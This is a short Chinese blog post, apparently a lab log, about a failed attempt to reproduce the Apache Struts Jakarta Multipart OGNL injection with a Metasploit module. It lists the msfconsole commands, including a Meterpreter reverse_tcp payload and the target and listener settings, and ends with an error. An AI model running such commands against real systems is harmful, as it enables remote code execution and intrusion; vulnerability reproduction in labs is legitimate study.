Apache Struts Jakarta Multipart Parser OGNL Injection(Metasploit)复现失败

0x01:环境
PentestBox2.2
下载Exploit
https://www.exploit-db.com/exploits/31433/
加载到metasploit-framework.bak\modules\exploits\multi\http\struts

0x02:

msf exploit(41614) > use exploit/multi/http/struts/41614
msf exploit(41614) > set payload windows/meterpreter/reverse_tcp
msf exploit(41614) > show options
msf exploit(41614) > set rhost 10.160.11.192
msf exploit(41614) > set targeturi /struts2-5-showcase/
msf exploit(41614) > set lhost 10.160.14.122
msf exploit(41614) > show options
msf exploit(41614) > run
[*] Started reverse TCP handler on 10.160.14.122:4444
[-] Exploit failed: Errno::ECONNRESET An existing connection was forcibly closed by the remote host.
[*] Exploit completed, but no session was created.
msf exploit(41614) >

执行失败?

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值